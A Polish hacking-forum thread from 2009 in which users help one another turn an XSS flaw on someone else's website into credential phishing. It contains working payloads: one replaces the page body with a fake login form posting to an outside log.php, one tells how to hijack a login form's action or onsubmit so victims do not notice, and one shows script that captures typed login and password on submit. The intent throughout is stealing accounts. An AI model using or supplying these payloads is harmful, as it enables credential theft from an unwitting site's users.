The user's
Frameset w XSS
Znalazłem ostatnio na pewnej stronie pewien błąd, pozwalający przeprowadzić atak XSS. Pobawiłem się trochę, ale teraz chciałbym zamienić zawartość strony. Chciałem zrobic coś takiego
Jednak ten kod nie działa.Kod html:<script>javascript:document.body.innerHTML='<frameset cols="100%,0%"><frame src="http://phishing.pl'" /><frame src="http//jakasstrona.pl" /></frameset>'</script>
Jak można zrobić coś takiego?
Ostatnio edytowane przez ruben : 10-08-2009 - 16:42
ojjj XSS dawno sie bawilem, dzisiaj juz praktycznie nawet nie szukam tego typu bledow
body.innerHTML dziala jesli jest znacznik body.
polecam error console w firefoxie jak nie wiesz gdzie blad
<script>document.body.innerHTML='<form action="http://google.com/log.php" method="post">login: <input type="text" name="login"><br>pass: <input type="password" name="pass"><br><input type="submit" value="ok"></form>'</script>
i nie uzywaj ramek, oprostu podmien formulaz logowania lub dopisz onsubmit - wtedy baaaardzo ciezko sie polapac ze wlasnie straciles konto
Ostatnio edytowane przez rax666 : 10-08-2009 - 18:30
The user's
chce podmienić body, i mam problem, który zaprezentuje na poniższym przykładzie
W przeglądarce wyświetla mi się takie coś ';Kod html:<script>document.body.innerHTML='aasas</script>';</script>
przeglądarka uznaje </script> między '' za zwykły </script> i przerywa tworzenie document.body w rezultacie nie uzyskuje odpwiedniego efektu. Jak pozbyć się tego problemu?
po co dajesz wiec </script> w srodku?
lesli jest doklejany, to poprostu zamknij ' i dopisz <script>
The user's
Chce wstawić nowy kod strony z podmienionym action w formularzu logowania, tyle, że w tym kodzie document.body przerwa się napotykając </script> w oryginalnym kodzie między znacznikami.
Chyba, ze można to zrobić w inny sposób?
Myślałem o podmianie jedynie action w formularzu a nie całego kodu strony, ale nie do końca wiem jak to zrobić.
Próbowałem zrobić coś takiego
W powyższym kodzie próbuje podmienić co prawda wartość pola formularza, ale i tak to nie działa. Da się zrobić coś takiego?Kod html:javascript:document.getElementsByName("story")[0].value="asaas"
sprobuj w ten sposobKod:<html> <body> <form action="http://example.com/login.php" method="post"> usr: <input name="login" /><br> pwd: <input name="pass" type="password"/><br> <input type="submit" value="login"> </form> <script> function hakuj(){ alert(document.getElementsByTagName('input')[0].value+'\r\n'+document.getElementsByTagName('input')[1].value); return true; } document.getElementsByTagName('form')[0].onsubmit=function(){ return hakuj() } </script> </body> </html>
mozesz potem to wysjac w iframe, tylko nie wiem jak zrobic to asynchronicznie by nie blokowalo przekierowania i zeby wyslalo zanim przekieruje. chyba mozna otworzyc nowe okienko i tam to robic, albo cos w tym stylu.
to, albo ramka... choc to moze sie pieknie wysypac pod IE < 6.0
Zasady Postowania
Copyright © 2006-2024 - HACK.pl. Wszelkie prawa zastrzeżone.
Odpowiedź z Cytatem
